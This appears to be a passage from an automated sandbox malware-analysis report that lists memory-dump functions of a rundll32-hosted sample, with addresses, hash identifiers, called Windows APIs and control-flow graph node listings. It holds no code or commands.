                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 633259c266d87a5b95fda6ce05470889e09af076b0dc8ff2f0ee963c60a24a3d
                                                                                                                                                                                                                                                  • Instruction ID: de4ea5b9e3f9a8077fbccb1ae49e52064009d4859817f5b38532e9b6eab09e3a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 633259c266d87a5b95fda6ce05470889e09af076b0dc8ff2f0ee963c60a24a3d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC11F970618B888FD6B0DF4998857AAB7E1FBD8721F54462FE48CD3210C7319841CB93
                                                                                                                                                                                                                                                  Function 0000016AD27DD98E Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                                                  • Instruction ID: 70a669bdce0360af5a4ed8ddf26b6109b9037591421ca1e87005283ddf5732a6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF0F470618B048BE344DF1884C927677E1FBD8715F24452EE889C7361CB329842CB43
                                                                                                                                                                                                                                                  Function 0000016AD27DD9FE Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                                                  • Instruction ID: 8f0d3b2c53fd494b03f61fdc13c2ffc96a1c15cac520bb87c7f0ff0648618024
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F0A470628B408BE754DF1884CA67677E1FBD8755F64852EE989C7361CB329882CB43
                                                                                                                                                                                                                                                  Function 0000016AD27DDA6E Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                                                  • Instruction ID: a083f9191c706146c8e7986bab9b69e3d9d12d8c9ae8219d5554d50f0b137a16
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F0B470A28F048BC704AF2C884AA7533D2FBE8B55F54462EE448D7361CB35E8428B83
                                                                                                                                                                                                                                                  Function 0000016AD2752050 Relevance: 22.8, APIs: 15, Instructions: 324COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 74 16ad2752050-16ad275209a call 16ad2751340 77 16ad275209c-16ad275209e 74->77 78 16ad27520a3-16ad27520bd 74->78 79 16ad2752640-16ad2752647 77->79 80 16ad27520bf-16ad27520cc SetLastError 78->80 81 16ad27520d1-16ad27520fa call 16ad2751340 78->81 80->79 84 16ad27520fc-16ad27520fe 81->84 85 16ad2752103-16ad275212a 81->85 84->79 86 16ad275213e-16ad275214c 85->86 87 16ad275212c-16ad2752139 SetLastError 85->87 88 16ad275214e-16ad275215b SetLastError 86->88 89 16ad2752160-16ad275216d 86->89 87->79 88->79 90 16ad275216f-16ad275217c SetLastError 89->90 91 16ad2752181-16ad27521b1 89->91 90->79 92 16ad27521cb-16ad27521d8 91->92 93 16ad275222b-16ad2752286 GetNativeSystemInfo 92->93 94 16ad27521da-16ad27521e3 92->94 97 16ad275229a-16ad27522c5 VirtualAlloc 93->97 98 16ad2752288-16ad2752295 SetLastError 93->98 95 16ad27521fc-16ad275220e 94->95 96 16ad27521e5-16ad27521fa 94->96 99 16ad2752213-16ad275221d 95->99 96->99 100 16ad27522ff-16ad2752324 GetProcessHeap HeapAlloc 97->100 101 16ad27522c7-16ad27522eb VirtualAlloc 97->101 98->79 102 16ad275221f-16ad2752224 99->102 103 16ad2752229 99->103 105 16ad275234b-16ad2752369 100->105 106 16ad2752326-16ad2752346 VirtualFree SetLastError 100->106 101->100 104 16ad27522ed-16ad27522fa SetLastError 101->104 102->103 103->92 104->79 107 16ad275236b-16ad2752373 105->107 108 16ad2752375 105->108 106->79 110 16ad275237d-16ad27523fe call 16ad2751340 107->110 108->110 113 16ad2752400 110->113 114 16ad275240a-16ad27524a7 VirtualAlloc call 16ad2751120 call 16ad2751380 110->114 115 16ad275262c-16ad275263e call 16ad27528e0 113->115 121 16ad27524ac-16ad27524ae 114->121 115->79 122 16ad27524b0 121->122 123 16ad27524ba-16ad27524e3 121->123 122->115 124 16ad2752509-16ad275250e 123->124 125 16ad27524e5-16ad2752507 call 16ad2751ab0 123->125 126 16ad2752515-16ad2752529 call 16ad2751c80 124->126 125->126 131 16ad275252b 126->131 132 16ad2752535-16ad2752549 call 16ad2751790 126->132 131->115 135 16ad275254b 132->135 136 16ad2752555-16ad2752569 call 16ad27519f0 132->136 135->115 139 16ad275256b 136->139 140 16ad2752575-16ad2752581 136->140 139->115 141 16ad2752587-16ad2752590 140->141 142 16ad2752618-16ad275261d 140->142 144 16ad27525f7-16ad2752612 141->144 145 16ad2752592-16ad27525d8 141->145 143 16ad2752625-16ad275262a 142->143 143->79 143->115 146 16ad2752616 144->146 148 16ad27525da-16ad27525e5 SetLastError 145->148 149 16ad27525e9-16ad27525f5 145->149 146->143 148->115 149->146
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  • Opcode ID: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                                                  • Instruction ID: ce7cf706ff479c633d90d4e2232b4daa5dad0394c03c5228d787fd48495beb57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F10B36619B8496EB60CB55E89079EB7A0FBC8B90F505015EB8E93F68DF3AC440CF01
                                                                                                                                                                                                                                                  Function 0000016AD27DCABE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 323COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$@$@$`
                                                                                                                                                                                                                                                  • API String ID: 0-307318802
                                                                                                                                                                                                                                                  • Opcode ID: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                                                  • Instruction ID: aa6b97b91d781027647f9919985863f54d88b8f72d0e9bb99e84c44147c3e87f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BB14D7061CB488FD764DF58D845B9AB7E0FB98710F508A1EA58DC3291EB74D944CB83
                                                                                                                                                                                                                                                  Function 0000016AD27DBE8E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                                                  • Instruction ID: 869f7e07c885d990cbf4146891147c7a7889a178cf4638557b72802b7afeb6d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EB1823121CA088FDB64EF5CC885B9AB7E1FF98710F50866EE489D7251DB35E845CB82
                                                                                                                                                                                                                                                  Function 0000016AD27515E0 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 158 16ad27515e0-16ad27515fc 159 16ad27515fe-16ad2751603 158->159 160 16ad2751608-16ad2751617 158->160 161 16ad2751784-16ad2751788 159->161 162 16ad275168c-16ad275169b 160->162 163 16ad2751619-16ad275162a 160->163 164 16ad275169d-16ad27516a5 162->164 165 16ad27516a7 162->165 166 16ad275162c-16ad2751635 163->166 167 16ad2751682-16ad2751687 163->167 168 16ad27516af-16ad27516c6 164->168 165->168 169 16ad2751637-16ad275164a 166->169 170 16ad2751664-16ad275167c VirtualFree 166->170 167->161 171 16ad27516c8-16ad27516d0 168->171 172 16ad27516d2 168->172 169->170 173 16ad275164c-16ad2751662 169->173 170->167 174 16ad27516da-16ad27516f1 171->174 172->174 173->167 173->170 175 16ad27516fd 174->175 176 16ad27516f3-16ad27516fb 174->176 177 16ad2751705-16ad2751747 175->177 176->177 178 16ad2751749-16ad2751751 177->178 179 16ad2751755-16ad2751779 VirtualProtect 177->179 178->179 180 16ad275177f 179->180 181 16ad275177b-16ad275177d 179->181 180->161 181->161
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                  • Opcode ID: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                                                  • Instruction ID: fb8f72ebf065e92c5813c521d5e079069af52875fc162db90d32f4a3a598bcbe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD51F436208B44DBEB60CB5AE88075AB7E1F7C8B95F444016EB8D97B68DB39D940CF01
                                                                                                                                                                                                                                                  Function 00007DF457370000 Relevance: 3.1, APIs: 2, Instructions: 88processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1812402828.00007DF457370000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF457370000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_7df457370000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3280610774-0
                                                                                                                                                                                                                                                  • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                                                  • Instruction ID: cde93335bfe134c8c6e7846cde9acd28946283dd7a600c17dcbab53e2e5290f7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A21BC3061894C8FEBA1EB5CD858BEE33E1EB98321F404266D81EDB390DE35AA44C750
                                                                                                                                                                                                                                                  Function 0000016AD2751380 Relevance: 2.6, APIs: 2, Instructions: 119memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  • Opcode ID: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                                                  • Instruction ID: ccbf4e21381a4c5a36591a95033f30684a01c2216141742741a9c1e689950c43
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B51E876618B44C6CB60CB5AE49075AB7A1F7C8BE9F109115EF8E83B68DB39C540CF00
                                                                                                                                                                                                                                                  Function 0000000273F414D0 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 203 273f414d0-273f414dc 204 273f414e0-273f414e7 SleepEx 203->204 204->204
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3794425031.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794369878.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794425031.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                                  • Opcode ID: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                                                  • Instruction ID: 0bf00bace8f2674ea540bcf736f3f2282d979a864102f6c7b7d6f84e33ec7844
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06B09B14F04594C7E2255791B44D7699610B74FBD1F249451C55D13755851455425702
                                                                                                                                                                                                                                                  Function 0000016AD27511C0 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 205 16ad27511c0-16ad27511f0 VirtualAlloc
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  • Opcode ID: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                                                  • Instruction ID: fc758a548713a61a3d8014fd9c8362b06f4bf22ae777eb1b5f21042cd4d6234e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87D052B2B0468083CB388B20E80060AAB60F788744F908018EB8C43B68CA3EC212CF00

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 000000018004C510 Relevance: 15.4, APIs: 10, Instructions: 371COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                                                                                  • Opcode ID: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                                                  • Instruction ID: abfc01c1cae31b126f3606ba6e35873ac6e2165b9242cca6e17ef92ae9629bfb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EE1A076204A898BE7B6CF15D488BD937A0F39D7CCF529016EB0947B84DB35CA09CB45
                                                                                                                                                                                                                                                  Function 000000018004C060 Relevance: 10.7, APIs: 7, Instructions: 249COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                                                                                  • Opcode ID: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                                                  • Instruction ID: c11a1434eabf13ff3ffc717c65629f10aad66df5d482a187dde0986ab906fb0d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55A1BDB2200A848BE7FA8F55E590BD977A0F3697CCF41D116EB4A57B84CB34CA48CB05
                                                                                                                                                                                                                                                  Function 0000000180052534 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                  • API String ID: 1791977518-905460609
                                                                                                                                                                                                                                                  • Opcode ID: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                                                  • Instruction ID: 68df83c6e16fb6719a30522dc5a7a3ce8abf960c58eb50addb9b285837f9a530
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF91AB32200B4986EBA69F21D5513E923A5FB8DBC4F54C121FE5867786EF3AC759C700
                                                                                                                                                                                                                                                  Function 0000000180053038 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
